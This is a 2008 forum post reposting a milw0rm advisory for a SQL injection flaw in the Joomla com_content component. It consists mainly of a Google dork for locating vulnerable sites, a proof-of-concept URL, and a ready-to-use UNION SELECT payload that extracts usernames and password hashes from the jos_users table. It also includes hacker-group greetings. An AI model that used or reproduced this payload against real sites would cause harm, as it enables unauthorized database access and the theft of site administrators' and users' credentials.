MasT3r ZaTaN Posted July 17, 2008 Report Posted July 17, 2008 ------------------------------------------------------------------------------------------- Joomla Component com_content SQL Injection Vulnerabity-------------------------------------------------------------------------------------------Author : unknown_stylerDork : inurl:com_contentPOC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*------------------------------------------------------------------------------------------------------------------------------------ Greetings : h4ck*-y0u.orgside note:<name>Página de contenido</name><author>Projecte Joomla!</author><creationDate>July 2004</creationDate><copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright><license>[url]http://www.gnu.org/copyleft/gpl.html[/url] GNU/GPL</license><authorEmail>admin@joomla.org</authorEmail><authorUrl>www.joomla.org</authorUrl><version>1.0.0</version># milw0rm.com [2008-07-08] Quote